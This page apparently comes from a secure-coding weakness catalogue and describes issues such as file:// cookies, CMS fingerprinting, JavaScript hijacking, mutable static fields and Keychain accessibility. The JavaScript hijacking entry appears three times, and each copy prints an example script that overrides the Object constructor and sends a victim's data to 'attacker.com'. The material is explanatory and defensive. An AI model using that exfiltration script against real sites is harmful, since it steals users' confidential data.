1576 items found
Weaknesses
Abstract
The application allows cookies to be used for file:// protocol which may have undesirable security implications.
Explanation
Cookies are strictly a HTTP mechanism as per RFC 2109. There should be no reasonable expectation for them to work for protocols other than HTTP, including file://. It is not clear what their behavior should be, and what rules of security compartmentalization should apply. For example, should HTML files downloaded to local disk from the Internet share the same cookies as any HTML code installed locally?
References
[1] Standards Mapping - General Data Protection Regulation (GDPR) Indirect Access to Sensitive Data
[2] Standards Mapping - OWASP Mobile Application Security Verification Standard 2.0 MASVS-CODE-4
desc.semantic.java.android_bad_practices_use_of_file_scheme_cookies
Abstract
Reconnaissance is a necessary precursor to any successful attack against an application. Attackers can use fingerprinting probes to identify the CMS used by the target application.
Explanation

Third-party applications that include content management systems with known vulnerabilities expand the attack surface available to the attacker. Deploying an unpatched or vulnerable version of a CMS can enable attackers to compromise the target by exploiting known vulnerabilities against the detected CMS.
Reconnaissance is a necessary precursor to any successful attack against an application. Attackers can use fingerprinting probes to identify the CMS used by the target application. This information can be used to:
- Devise attacks focused on exploiting known vulnerabilities reported against the detected CMS
- Test for default configuration properties that could lead to security weaknesses
desc.dynamic.xtended_preview.information_discovery_content_management_system
Abstract
Applications that leverage Microsoft AJAX.NET (Atlas) can be vulnerable to JavaScript hijacking, which allows an unauthorized attacker to read confidential data.
Explanation
Microsoft AJAX.NET (Atlas) uses JSON to transfer data between the server and the client. The framework produces responses comprised of valid JavaScript that can be evaluated using a <script> tag and is therefore vulnerable to JavaScript hijacking [1]. By default, the framework use the POST method to submit requests, which makes it difficult to generate a request from a malicious <script> tag (since <script> tags only generate GET requests). However, Microsoft AJAX.NET does provide mechanisms for using GET requests. In fact, many experts encourage programmers to use GET requests in order to leverage browser caching and improve performance.

An application may be vulnerable to JavaScript hijacking if it: 1) Uses JavaScript objects as a data transfer format 2) Handles confidential data. Because JavaScript hijacking vulnerabilities do not occur as a direct result of a coding mistake, the Fortify Secure Coding Rulepacks call attention to potential JavaScript hijacking vulnerabilities by identifying code that appears to generate JavaScript in an HTTP response.

Web browsers enforce the Same Origin Policy in order to protect users from malicious websites. The Same Origin Policy requires that, in order for JavaScript to access the contents of a web page, both the JavaScript and the web page must originate from the same domain. Without the Same Origin Policy, a malicious website could serve up JavaScript that loads sensitive information from other websites using a client's credentials, culls through it, and communicates it back to the attacker. JavaScript hijacking allows an attacker to bypass the Same Origin Policy in the case that a web application uses JavaScript to communicate confidential information. The loophole in the Same Origin Policy is that it allows JavaScript from any website to be included and executed in the context of any other website. Even though a malicious site cannot directly examine any data loaded from a vulnerable site on the client, it can still take advantage of this loophole by setting up an environment that allows it to witness the execution of the JavaScript and any relevant side effects it may have. Since many Web 2.0 applications use JavaScript as a data transport mechanism, they are often vulnerable while traditional web applications are not.

The most popular format for communicating information in JavaScript is JavaScript Object Notation (JSON). The JSON RFC defines JSON syntax to be a subset of JavaScript object literal syntax. JSON is based on two types of data structures: arrays and objects. Any data transport format where messages can be interpreted as one or more valid JavaScript statements is vulnerable to JavaScript hijacking. JSON makes JavaScript hijacking easier by the fact that a JSON array stands on its own as a valid JavaScript statement. Since arrays are a natural form for communicating lists, they are commonly used wherever an application needs to communicate multiple values. Put another way, a JSON array is directly vulnerable to JavaScript hijacking. A JSON object is only vulnerable if it is wrapped in some other JavaScript construct that stands on its own as a valid JavaScript statement.

Example 1: The following example begins by showing a legitimate JSON interaction between the client and server components of a web application used to manage sales leads. It goes on to show how an attacker may mimic the client and gain access to the confidential data the server returns. Note that this example is written for Mozilla-based browsers. Other mainstream browsers do not allow native constructors to be overridden when an object is created without the use of the new operator.

The client requests data from a server and evaluates the result as JSON with the following code:


var object;
var req = new XMLHttpRequest();
req.open("GET", "/object.json",true);
req.onreadystatechange = function () {
if (req.readyState == 4) {
var txt = req.responseText;
object = eval("(" + txt + ")");
req = null;
}
};
req.send(null);


When the code runs, it generates an HTTP request which appears as the following:


GET /object.json HTTP/1.1
...
Host: www.example.com
Cookie: JSESSIONID=F2rN6HopNzsfXFjHX1c5Ozxi0J5SQZTr4a5YJaSbAiTnRR


(In this HTTP response and the one that follows we have elided HTTP headers that are not directly relevant to this explanation.)
The server responds with an array in JSON format:


HTTP/1.1 200 OK
Cache-control: private
Content-Type: text/javascript; charset=utf-8
...
[{"fname":"Brian", "lname":"Chess", "phone":"6502135600",
"purchases":60000.00, "email":"brian@example.com" },
{"fname":"Katrina", "lname":"O'Neil", "phone":"6502135600",
"purchases":120000.00, "email":"katrina@example.com" },
{"fname":"Jacob", "lname":"West", "phone":"6502135600",
"purchases":45000.00, "email":"jacob@example.com" }]


In this case, the JSON contains confidential information associated with the current user (a list of sales leads). Other users cannot access this information without knowing the user's session identifier. (In most modern web applications, the session identifier is stored as a cookie.) However, if a victim visits a malicious website, the malicious site can retrieve the information using JavaScript hijacking. If a victim can be tricked into visiting a web page that contains the following malicious code, the victim's lead information will be sent to the attacker's web site.


<script>
// override the constructor used to create all objects so
// that whenever the "email" field is set, the method
// captureObject() will run. Since "email" is the final field,
// this will allow us to steal the whole object.
function Object() {
this.email setter = captureObject;
}

// Send the captured object back to the attacker's Web site
function captureObject(x) {
var objString = "";
for (fld in this) {
objString += fld + ": " + this[fld] + ", ";
}
objString += "email: " + x;
var req = new XMLHttpRequest();
req.open("GET", "http://attacker.com?obj=" +
escape(objString),true);
req.send(null);
}
</script>

<!-- Use a script tag to bring in victim's data -->
<script src="http://www.example.com/object.json"></script>


The malicious code uses a script tag to include the JSON object in the current page. The web browser will send up the appropriate session cookie with the request. In other words, this request will be handled just as though it had originated from the legitimate application.

When the JSON array arrives on the client, it will be evaluated in the context of the malicious page. In order to witness the evaluation of the JSON, the malicious page has redefined the JavaScript function used to create new objects. In this way, the malicious code has inserted a hook that allows it to get access to the creation of each object and transmit the object's contents back to the malicious site. Other attacks might override the default constructor for arrays instead. Applications that are built to be used in a mashup sometimes invoke a callback function at the end of each JavaScript message. The callback function is meant to be defined by another application in the mashup. A callback function makes a JavaScript hijacking attack a trivial affair -- all the attacker has to do is define the function. An application can be mashup-friendly or it can be secure, but it cannot be both. If the user is not logged into the vulnerable site, the attacker may compensate by asking the user to log in and then displaying the legitimate login page for the application.

This is not a phishing attack -- the attacker does not gain access to the user's credentials -- so anti-phishing countermeasures will not be able to defeat the attack. More complex attacks could make a series of requests to the application by using JavaScript to dynamically generate script tags. This same technique is sometimes used to create application mashups. The only difference is that, in this mashup scenario, one of the applications involved is malicious.
References
[1] B. Chess, Y. O'Neil, and J. West JavaScript Hijacking
[2] Standards Mapping - DISA Control Correlation Identifier Version 2 CCI-001167
[3] Standards Mapping - General Data Protection Regulation (GDPR) Access Violation
[4] Standards Mapping - NIST Special Publication 800-53 Revision 4 SC-18 Mobile Code (P2)
[5] Standards Mapping - NIST Special Publication 800-53 Revision 5 SC-18 Mobile Code
[6] Standards Mapping - OWASP Mobile 2014 M4 Unintended Data Leakage
[7] Standards Mapping - Security Technical Implementation Guide Version 4.2 APSC-DV-003300 CAT II
[8] Standards Mapping - Security Technical Implementation Guide Version 4.3 APSC-DV-003300 CAT II
[9] Standards Mapping - Security Technical Implementation Guide Version 4.4 APSC-DV-003300 CAT II
[10] Standards Mapping - Security Technical Implementation Guide Version 4.5 APSC-DV-003300 CAT II
[11] Standards Mapping - Security Technical Implementation Guide Version 4.6 APSC-DV-003300 CAT II
[12] Standards Mapping - Security Technical Implementation Guide Version 4.7 APSC-DV-003300 CAT II
[13] Standards Mapping - Security Technical Implementation Guide Version 4.8 APSC-DV-003300 CAT II
[14] Standards Mapping - Security Technical Implementation Guide Version 4.9 APSC-DV-003300 CAT II
[15] Standards Mapping - Security Technical Implementation Guide Version 4.10 APSC-DV-003300 CAT II
[16] Standards Mapping - Security Technical Implementation Guide Version 4.11 APSC-DV-003300 CAT II
[17] Standards Mapping - Security Technical Implementation Guide Version 4.1 APSC-DV-003300 CAT II
[18] Standards Mapping - Security Technical Implementation Guide Version 5.1 APSC-DV-003300 CAT II
[19] Standards Mapping - Security Technical Implementation Guide Version 5.2 APSC-DV-003300 CAT II
[20] Standards Mapping - Security Technical Implementation Guide Version 5.3 APSC-DV-003300 CAT II
[21] Standards Mapping - Security Technical Implementation Guide Version 6.1 APSC-DV-003300 CAT II
[22] Standards Mapping - Security Technical Implementation Guide Version 6.2 APSC-DV-003300 CAT II
[23] Standards Mapping - Web Application Security Consortium Version 2.00 Information Leakage (WASC-13)
[24] Standards Mapping - Web Application Security Consortium 24 + 2 Information Leakage
desc.semantic.dotnet.javascript_hijacking_vulnerable_framework
Abstract
Applications that leverage versions of the DWR Ajax framework 1.1.4 and earlier are vulnerable to JavaScript hijacking, which allows an unauthorized attacker to read confidential data.
Explanation
All released versions of DWR up to and including 1.1.4 are vulnerable to JavaScript hijacking [1]. Until now, the framework has not built any mechanisms for preventing the vulnerability. The good news is that DWR 2.0 is protected against JavaScript hijacking by a mechanism designed to prevent Cross-Site Request Forgery. The protection leverages the fact that malicious script cannot read secrets stored in cookies set by other domains, which allows the framework to use a value stored in a cookie as a secret shared between the client and server. DWR 2.0 automatically appends the session cookie to the request in the client and verifies on the server that each request contains the correct value.

An application may be vulnerable to JavaScript hijacking if it: 1) Uses JavaScript objects as a data transfer format 2) Handles confidential data. Because JavaScript hijacking vulnerabilities do not occur as a direct result of a coding mistake, the Fortify Secure Coding Rulepacks call attention to potential JavaScript hijacking vulnerabilities by identifying code that appears to generate JavaScript in an HTTP response.

Web browsers enforce the Same Origin Policy in order to protect users from malicious websites. The Same Origin Policy requires that, in order for JavaScript to access the contents of a web page, both the JavaScript and the web page must originate from the same domain. Without the Same Origin Policy, a malicious website could serve up JavaScript that loads sensitive information from other websites using a client's credentials, culls through it, and communicates it back to the attacker. JavaScript hijacking allows an attacker to bypass the Same Origin Policy in the case that a web application uses JavaScript to communicate confidential information. The loophole in the Same Origin Policy is that it allows JavaScript from any website to be included and executed in the context of any other website. Even though a malicious site cannot directly examine any data loaded from a vulnerable site on the client, it can still take advantage of this loophole by setting up an environment that allows it to witness the execution of the JavaScript and any relevant side effects it may have. Since many Web 2.0 applications use JavaScript as a data transport mechanism, they are often vulnerable while traditional web applications are not.

The most popular format for communicating information in JavaScript is JavaScript Object Notation (JSON). The JSON RFC defines JSON syntax to be a subset of JavaScript object literal syntax. JSON is based on two types of data structures: arrays and objects. Any data transport format where messages can be interpreted as one or more valid JavaScript statements is vulnerable to JavaScript hijacking. JSON makes JavaScript hijacking easier by the fact that a JSON array stands on its own as a valid JavaScript statement. Since arrays are a natural form for communicating lists, they are commonly used wherever an application needs to communicate multiple values. Put another way, a JSON array is directly vulnerable to JavaScript hijacking. A JSON object is only vulnerable if it is wrapped in some other JavaScript construct that stands on its own as a valid JavaScript statement.

Example 1: The following example begins by showing a legitimate JSON interaction between the client and server components of a web application used to manage sales leads. It goes on to show how an attacker may mimic the client and gain access to the confidential data the server returns. Note that this example is written for Mozilla-based browsers. Other mainstream browsers do not allow native constructors to be overridden when an object is created without the use of the new operator.

The client requests data from a server and evaluates the result as JSON with the following code:


var object;
var req = new XMLHttpRequest();
req.open("GET", "/object.json",true);
req.onreadystatechange = function () {
if (req.readyState == 4) {
var txt = req.responseText;
object = eval("(" + txt + ")");
req = null;
}
};
req.send(null);


When the code runs, it generates an HTTP request which appears as the following:


GET /object.json HTTP/1.1
...
Host: www.example.com
Cookie: JSESSIONID=F2rN6HopNzsfXFjHX1c5Ozxi0J5SQZTr4a5YJaSbAiTnRR


(In this HTTP response and the one that follows we have elided HTTP headers that are not directly relevant to this explanation.)
The server responds with an array in JSON format:


HTTP/1.1 200 OK
Cache-control: private
Content-Type: text/javascript; charset=utf-8
...
[{"fname":"Brian", "lname":"Chess", "phone":"6502135600",
"purchases":60000.00, "email":"brian@example.com" },
{"fname":"Katrina", "lname":"O'Neil", "phone":"6502135600",
"purchases":120000.00, "email":"katrina@example.com" },
{"fname":"Jacob", "lname":"West", "phone":"6502135600",
"purchases":45000.00, "email":"jacob@example.com" }]


In this case, the JSON contains confidential information associated with the current user (a list of sales leads). Other users cannot access this information without knowing the user's session identifier. (In most modern web applications, the session identifier is stored as a cookie.) However, if a victim visits a malicious website, the malicious site can retrieve the information using JavaScript hijacking. If a victim can be tricked into visiting a web page that contains the following malicious code, the victim's lead information will be sent to the attacker's web site.


<script>
// override the constructor used to create all objects so
// that whenever the "email" field is set, the method
// captureObject() will run. Since "email" is the final field,
// this will allow us to steal the whole object.
function Object() {
this.email setter = captureObject;
}

// Send the captured object back to the attacker's Web site
function captureObject(x) {
var objString = "";
for (fld in this) {
objString += fld + ": " + this[fld] + ", ";
}
objString += "email: " + x;
var req = new XMLHttpRequest();
req.open("GET", "http://attacker.com?obj=" +
escape(objString),true);
req.send(null);
}
</script>

<!-- Use a script tag to bring in victim's data -->
<script src="http://www.example.com/object.json"></script>


The malicious code uses a script tag to include the JSON object in the current page. The web browser will send up the appropriate session cookie with the request. In other words, this request will be handled just as though it had originated from the legitimate application.

When the JSON array arrives on the client, it will be evaluated in the context of the malicious page. In order to witness the evaluation of the JSON, the malicious page has redefined the JavaScript function used to create new objects. In this way, the malicious code has inserted a hook that allows it to get access to the creation of each object and transmit the object's contents back to the malicious site. Other attacks might override the default constructor for arrays instead. Applications that are built to be used in a mashup sometimes invoke a callback function at the end of each JavaScript message. The callback function is meant to be defined by another application in the mashup. A callback function makes a JavaScript hijacking attack a trivial affair -- all the attacker has to do is define the function. An application can be mashup-friendly or it can be secure, but it cannot be both. If the user is not logged into the vulnerable site, the attacker may compensate by asking the user to log in and then displaying the legitimate login page for the application.

This is not a phishing attack -- the attacker does not gain access to the user's credentials -- so anti-phishing countermeasures will not be able to defeat the attack. More complex attacks could make a series of requests to the application by using JavaScript to dynamically generate script tags. This same technique is sometimes used to create application mashups. The only difference is that, in this mashup scenario, one of the applications involved is malicious.
References
[1] B. Chess, Y. O'Neil, and J. West JavaScript Hijacking
[2] Standards Mapping - DISA Control Correlation Identifier Version 2 CCI-001167
[3] Standards Mapping - General Data Protection Regulation (GDPR) Access Violation
[4] Standards Mapping - NIST Special Publication 800-53 Revision 4 SC-18 Mobile Code (P2)
[5] Standards Mapping - NIST Special Publication 800-53 Revision 5 SC-18 Mobile Code
[6] Standards Mapping - OWASP Mobile 2014 M4 Unintended Data Leakage
[7] Standards Mapping - Security Technical Implementation Guide Version 4.2 APSC-DV-003300 CAT II
[8] Standards Mapping - Security Technical Implementation Guide Version 4.3 APSC-DV-003300 CAT II
[9] Standards Mapping - Security Technical Implementation Guide Version 4.4 APSC-DV-003300 CAT II
[10] Standards Mapping - Security Technical Implementation Guide Version 4.5 APSC-DV-003300 CAT II
[11] Standards Mapping - Security Technical Implementation Guide Version 4.6 APSC-DV-003300 CAT II
[12] Standards Mapping - Security Technical Implementation Guide Version 4.7 APSC-DV-003300 CAT II
[13] Standards Mapping - Security Technical Implementation Guide Version 4.8 APSC-DV-003300 CAT II
[14] Standards Mapping - Security Technical Implementation Guide Version 4.9 APSC-DV-003300 CAT II
[15] Standards Mapping - Security Technical Implementation Guide Version 4.10 APSC-DV-003300 CAT II
[16] Standards Mapping - Security Technical Implementation Guide Version 4.11 APSC-DV-003300 CAT II
[17] Standards Mapping - Security Technical Implementation Guide Version 4.1 APSC-DV-003300 CAT II
[18] Standards Mapping - Security Technical Implementation Guide Version 5.1 APSC-DV-003300 CAT II
[19] Standards Mapping - Security Technical Implementation Guide Version 5.2 APSC-DV-003300 CAT II
[20] Standards Mapping - Security Technical Implementation Guide Version 5.3 APSC-DV-003300 CAT II
[21] Standards Mapping - Security Technical Implementation Guide Version 6.1 APSC-DV-003300 CAT II
[22] Standards Mapping - Security Technical Implementation Guide Version 6.2 APSC-DV-003300 CAT II
[23] Standards Mapping - Web Application Security Consortium Version 2.00 Information Leakage (WASC-13)
[24] Standards Mapping - Web Application Security Consortium 24 + 2 Information Leakage
desc.config.java.javascript_hijacking_vulnerable_framework
Abstract
Applications that use JavaScript notation to transport sensitive data can be vulnerable to JavaScript hijacking, which allows an unauthorized attacker to read confidential data from a vulnerable application.
Explanation
An application may be vulnerable to JavaScript hijacking if it: 1) Uses JavaScript objects as a data transfer format 2) Handles confidential data. Because JavaScript hijacking vulnerabilities do not occur as a direct result of a coding mistake, the Fortify Secure Coding Rulepacks call attention to potential JavaScript hijacking vulnerabilities by identifying code that appears to generate JavaScript in an HTTP response.

Web browsers enforce the Same Origin Policy to protect users from malicious websites. The Same Origin Policy requires that, in order for JavaScript to access the contents of a web page, both the JavaScript and the web page must originate from the same domain. Without the Same Origin Policy, a malicious website could serve up JavaScript that loads sensitive information from other websites using a client's credentials, culls through it, and communicates it back to the attacker. JavaScript hijacking allows an attacker to bypass the Same Origin Policy in the case that a web application uses JavaScript to communicate confidential information. The loophole in the Same Origin Policy is that it allows JavaScript from any website to be included and executed in the context of any other website. Even though a malicious site cannot directly examine any data loaded from a vulnerable site on the client, it can still take advantage of this loophole by setting up an environment that allows it to witness the execution of the JavaScript and any relevant side effects it may have. Since many Web 2.0 applications use JavaScript as a data transport mechanism, they are often vulnerable while traditional web applications are not.

The most popular format for communicating information in JavaScript is JavaScript Object Notation (JSON). The JSON RFC defines JSON syntax to be a subset of JavaScript object literal syntax. JSON is based on two types of data structures: arrays and objects. Any data transport format where messages can be interpreted as one or more valid JavaScript statements is vulnerable to JavaScript hijacking. JSON makes JavaScript hijacking easier by the fact that a JSON array stands on its own as a valid JavaScript statement. Since arrays are a natural form for communicating lists, they are commonly used wherever an application needs to communicate multiple values. Put another way, a JSON array is directly vulnerable to JavaScript hijacking. A JSON object is only vulnerable if it is wrapped in some other JavaScript construct that stands on its own as a valid JavaScript statement.

Example 1: The following example begins by showing a legitimate JSON interaction between the client and server components of a web application used to manage sales leads. It goes on to show how an attacker may mimic the client and gain access to the confidential data the server returns. Note that this example is written for Mozilla-based browsers. Other mainstream browsers do not allow native constructors to be overridden when an object is created without the use of the new operator.

The client requests data from a server and evaluates the result as JSON with the following code:


var object;
var req = new XMLHttpRequest();
req.open("GET", "/object.json",true);
req.onreadystatechange = function () {
if (req.readyState == 4) {
var txt = req.responseText;
object = eval("(" + txt + ")");
req = null;
}
};
req.send(null);


When the code runs, it generates an HTTP request which appears as the following:


GET /object.json HTTP/1.1
...
Host: www.example.com
Cookie: JSESSIONID=F2rN6HopNzsfXFjHX1c5Ozxi0J5SQZTr4a5YJaSbAiTnRR


(In this HTTP response and the one that follows we have elided HTTP headers that are not directly relevant to this explanation.)
The server responds with an array in JSON format:


HTTP/1.1 200 OK
Cache-control: private
Content-Type: text/JavaScript; charset=utf-8
...
[{"fname":"Brian", "lname":"Chess", "phone":"6502135600",
"purchases":60000.00, "email":"brian@example.com" },
{"fname":"Katrina", "lname":"O'Neil", "phone":"6502135600",
"purchases":120000.00, "email":"katrina@example.com" },
{"fname":"Jacob", "lname":"West", "phone":"6502135600",
"purchases":45000.00, "email":"jacob@example.com" }]


In this case, the JSON contains confidential information associated with the current user (a list of sales leads). Other users cannot access this information without knowing the user's session identifier. (In most modern web applications, the session identifier is stored as a cookie.) However, if a victim visits a malicious website, the malicious site can retrieve the information using JavaScript hijacking. If a victim can be tricked into visiting a web page that contains the following malicious code, the victim's lead information will be sent to the attacker's web site.


<script>
// override the constructor used to create all objects so
// that whenever the "email" field is set, the method
// captureObject() will run. Since "email" is the final field,
// this will allow us to steal the whole object.
function Object() {
this.email setter = captureObject;
}
// Send the captured object back to the attacker's web site
function captureObject(x) {
var objString = "";
for (fld in this) {
objString += fld + ": " + this[fld] + ", ";
}
objString += "email: " + x;
var req = new XMLHttpRequest();
req.open("GET", "http://attacker.com?obj=" +
escape(objString),true);
req.send(null);
}
</script>
<!-- Use a script tag to bring in victim's data -->
<script src="http://www.example.com/object.json"></script>


The malicious code uses a script tag to include the JSON object in the current page. The web browser will send up the appropriate session cookie with the request. In other words, this request will be handled just as though it had originated from the legitimate application.

When the JSON array arrives on the client, it will be evaluated in the context of the malicious page. In order to witness the evaluation of the JSON, the malicious page has redefined the JavaScript function used to create new objects. In this way, the malicious code has inserted a hook that allows it to get access to the creation of each object and transmit the object's contents back to the malicious site. Other attacks might override the default constructor for arrays instead. Applications that are built to be used in a mashup sometimes invoke a callback function at the end of each JavaScript message. The callback function is meant to be defined by another application in the mashup. A callback function makes a JavaScript hijacking attack a trivial affair -- all the attacker has to do is define the function. An application can be mashup-friendly or it can be secure, but it cannot be both. If the user is not logged into the vulnerable site, the attacker may compensate by asking the user to log in and then displaying the legitimate login page for the application.

This is not a phishing attack -- the attacker does not gain access to the user's credentials -- so anti-phishing countermeasures will not be able to defeat the attack. More complex attacks could make a series of requests to the application by using JavaScript to dynamically generate script tags. This same technique is sometimes used to create application mashups. The only difference is that, in this mashup scenario, one of the applications involved is malicious.
References
[1] B. Chess, Y. O'Neil, and J. West JavaScript Hijacking
[2] Standards Mapping - DISA Control Correlation Identifier Version 2 CCI-001167
[3] Standards Mapping - General Data Protection Regulation (GDPR) Access Violation
[4] Standards Mapping - NIST Special Publication 800-53 Revision 4 SC-18 Mobile Code (P2)
[5] Standards Mapping - NIST Special Publication 800-53 Revision 5 SC-18 Mobile Code
[6] Standards Mapping - OWASP Mobile 2014 M4 Unintended Data Leakage
[7] Standards Mapping - Security Technical Implementation Guide Version 4.2 APSC-DV-003300 CAT II
[8] Standards Mapping - Security Technical Implementation Guide Version 4.3 APSC-DV-003300 CAT II
[9] Standards Mapping - Security Technical Implementation Guide Version 4.4 APSC-DV-003300 CAT II
[10] Standards Mapping - Security Technical Implementation Guide Version 4.5 APSC-DV-003300 CAT II
[11] Standards Mapping - Security Technical Implementation Guide Version 4.6 APSC-DV-003300 CAT II
[12] Standards Mapping - Security Technical Implementation Guide Version 4.7 APSC-DV-003300 CAT II
[13] Standards Mapping - Security Technical Implementation Guide Version 4.8 APSC-DV-003300 CAT II
[14] Standards Mapping - Security Technical Implementation Guide Version 4.9 APSC-DV-003300 CAT II
[15] Standards Mapping - Security Technical Implementation Guide Version 4.10 APSC-DV-003300 CAT II
[16] Standards Mapping - Security Technical Implementation Guide Version 4.11 APSC-DV-003300 CAT II
[17] Standards Mapping - Security Technical Implementation Guide Version 4.1 APSC-DV-003300 CAT II
[18] Standards Mapping - Security Technical Implementation Guide Version 5.1 APSC-DV-003300 CAT II
[19] Standards Mapping - Security Technical Implementation Guide Version 5.2 APSC-DV-003300 CAT II
[20] Standards Mapping - Security Technical Implementation Guide Version 5.3 APSC-DV-003300 CAT II
[21] Standards Mapping - Security Technical Implementation Guide Version 6.1 APSC-DV-003300 CAT II
[22] Standards Mapping - Security Technical Implementation Guide Version 6.2 APSC-DV-003300 CAT II
[23] Standards Mapping - Web Application Security Consortium Version 2.00 Information Leakage (WASC-13)
[24] Standards Mapping - Web Application Security Consortium 24 + 2 Information Leakage
desc.dataflow.javascript.javascript_hijacking_vulnerable_framework
Abstract
Non-final public static fields can be changed by external classes.
Explanation
Typically, you do not want to provide external classes direct access to your object's member fields since a public field can be changed by any external class. Good object oriented designed uses encapsulation to prevent implementation details, such as member fields, from being exposed to other classes. Further, if the system assumes that this field cannot be changed, then malicious code might be able to adversely change the behavior of the system.

Example 1: In the following code, the field ERROR_CODE is declared as public and static, but not final:


public class MyClass
{
public static int ERROR_CODE = 100;
//...
}


In this case, malicious code might be able to change this error code and cause the program to behave in an unexpected manner.
References
[1] Sun Microsystems, Inc. Secure Coding Guidelines for the Java Programming Language, version 2.0
[2] OBJ10-J. Do not use public static nonfinal fields CERT
[3] MUTABLE-9: Make public static fields final Oracle
[4] Standards Mapping - Common Weakness Enumeration CWE ID 493
desc.structural.java.poor_style_non-final_public_static_field
Abstract
A field is erroneously assigned a negative value.
Explanation
This field has been annotated with FortifyNonNegative, which is used to indicate that negative values are not permitted.
References
[1] Standards Mapping - Common Weakness Enumeration CWE ID 20
[2] Standards Mapping - Common Weakness Enumeration Top 25 2021 [4] CWE ID 020
[3] Standards Mapping - Common Weakness Enumeration Top 25 2022 [4] CWE ID 020
[4] Standards Mapping - Common Weakness Enumeration Top 25 2023 [6] CWE ID 020
[5] Standards Mapping - Common Weakness Enumeration Top 25 2024 [12] CWE ID 020
[6] Standards Mapping - OWASP Application Security Verification Standard 4.0 5.1.3 Input Validation Requirements (L1 L2 L3), 5.1.4 Input Validation Requirements (L1 L2 L3)
[7] Standards Mapping - SANS Top 25 2009 Insecure Interaction - CWE ID 020
desc.structural.java.erroneous_negative_value_field
Abstract
A variable is erroneously assigned a zero value.
Explanation
This field has been annotated with FortifyNonZero, which is used to indicate that zero is not a permitted value.
References
[1] Standards Mapping - Common Weakness Enumeration CWE ID 20
[2] Standards Mapping - Common Weakness Enumeration Top 25 2021 [4] CWE ID 020
[3] Standards Mapping - Common Weakness Enumeration Top 25 2022 [4] CWE ID 020
[4] Standards Mapping - Common Weakness Enumeration Top 25 2023 [6] CWE ID 020
[5] Standards Mapping - Common Weakness Enumeration Top 25 2024 [12] CWE ID 020
[6] Standards Mapping - OWASP Application Security Verification Standard 4.0 5.1.3 Input Validation Requirements (L1 L2 L3), 5.1.4 Input Validation Requirements (L1 L2 L3)
[7] Standards Mapping - SANS Top 25 2009 Insecure Interaction - CWE ID 020
desc.structural.java.erroneous_zero_value_field
Abstract
The method is restricted. Each use of this method is flagged as an issue.
Explanation
Within the Foreign Function and Memory API, some methods are considered restricted because using them incorrectly can lead to JVM crashes or memory corruption.
References
[1] Oracle Foreign Function and Memory API: Restricted Methods
[2] Standards Mapping - Common Weakness Enumeration CWE ID 749
[3] Standards Mapping - NIST Special Publication 800-53 Revision 4 SI-16 Memory Protection (P1)
[4] Standards Mapping - NIST Special Publication 800-53 Revision 5 SI-16 Memory Protection
[5] Standards Mapping - OWASP Application Security Verification Standard 4.0 5.4.2 Memory/String/Unmanaged Code Requirements (L1 L2 L3)
[6] Standards Mapping - SANS Top 25 2011 Risky Resource Management - CWE ID 676
desc.structural.java.ffr_restricted_methods
Abstract
The identified method stores data in the Keychain without specifying an accessibility level.
Explanation
When storing data into the Keychain, an accessibility level needs to be set up which defines when it will be possible to access the item. The possible accessibility levels include:

-kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly:
The data in the Keychain item cannot be accessed after a restart until the device has been unlocked once by the user.
After the first unlock, the data remains accessible until the next restart. This is recommended for items that need to be accessed by background applications. Items with this attribute do not migrate to a new device. Thus, after restoring from a backup of a different device, these items will not be present.
Available in iOS 4.0 and later.

-kSecAttrAccessibleAlways:
The data in the Keychain item can always be accessed regardless of whether the device is locked.
This is not recommended for application use. Items with this attribute migrate to a new device when using encrypted backups.
Available in iOS 4.0 and later.

-kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly:
The data in the Keychain can only be accessed when the device is unlocked. Only available if a passcode is set on the device.
This is recommended for items that only need to be accessible while the application is in the foreground. Items with this attribute never migrate to a new device. After a backup is restored to a new device, these items are missing. No items can be stored in this class on devices without a passcode. Disabling the device passcode causes all items in this class to be deleted.
Available in iOS 8.0 and later.

-kSecAttrAccessibleAlwaysThisDeviceOnly:
The data in the Keychain item can always be accessed regardless of whether the device is locked.
This is not recommended for application use. Items with this attribute do not migrate to a new device. Thus, after restoring from a backup of a different device, these items will not be present.
Available in iOS 4.0 and later.

-kSecAttrAccessibleWhenUnlocked:
The data in the Keychain item can be accessed only while the device is unlocked by the user.
This is recommended for items that need to be accessible only while the application is in the foreground. Items with this attribute migrate to a new device when using encrypted backups.
This is the default value for Keychain items added without explicitly setting an accessibility constant.
Available in iOS 4.0 and later.

-kSecAttrAccessibleWhenUnlockedThisDeviceOnly:
The data in the Keychain item can be accessed only while the device is unlocked by the user.
This is recommended for items that need to be accessible only while the application is in the foreground. Items with this attribute do not migrate to a new device. Thus, after restoring from a backup of a different device, these items will not be present.
Available in iOS 4.0 and later.

When Keychain protections were first introduced, the default value was kSecAttrAccessibleAlways, which created a security problem since someone that can get access or steal your device will be able to read the contents of the Keychain. Currently, the default attribute is kSecAttrAccessibleWhenUnlocked, which is a reasonably restrictive default. However, Apple's public documentation disagrees about what the default attribute is supposed to be, so just in case, you should set this attribute explicitly on all Keychain items.

Example 1: In the following example the Keychain item is stored without clearly specifying an accessibility level which may behave differently on different iOS versions:


...
NSMutableDictionary *dict = [NSMutableDictionary dictionary];
NSData *token = [@"secret" dataUsingEncoding:NSUTF8StringEncoding];

// Configure Keychain Item
[dict setObject:(__bridge id)kSecClassGenericPassword forKey:(__bridge id) kSecClass];
[dict setObject:token forKey:(__bridge id)kSecValueData];
...

OSStatus error = SecItemAdd((__bridge CFDictionaryRef)dict, NULL);
...
References
[1] Keychain Services Apple
[2] Keychain Item Accessibility Constants Apple
[3] David Thiel iOS Application Security: The Definitive Guide for Hackers and Developers No Starch Press
[4] Standards Mapping - Common Weakness Enumeration CWE ID 359
[5] Standards Mapping - Common Weakness Enumeration Top 25 2019 [4] CWE ID 200
[6] Standards Mapping - Common Weakness Enumeration Top 25 2020 [7] CWE ID 200
[7] Standards Mapping - Common Weakness Enumeration Top 25 2021 [20] CWE ID 200
[8] Standards Mapping - Common Weakness Enumeration Top 25 2024 [17] CWE ID 200
[9] Standards Mapping - General Data Protection Regulation (GDPR) Insufficient Data Protection
[10] Standards Mapping - OWASP Application Security Verification Standard 4.0 8.2.2 Client-side Data Protection (L1 L2 L3), 8.3.4 Sensitive Private Data (L1 L2 L3), 10.2.1 Malicious Code Search (L2 L3)
[11] Standards Mapping - OWASP Mobile 2024 M9 Insecure Data Storage
[12] Standards Mapping - OWASP Mobile Application Security Verification Standard 2.0 MASVS-AUTH-2, MASVS-STORAGE-2
[13] Standards Mapping - Payment Card Industry Data Security Standard Version 4.0 Requirement 3.3.1, Requirement 3.5.1, Requirement 4.2.2, Requirement 6.2.4, Requirement 8.3.1
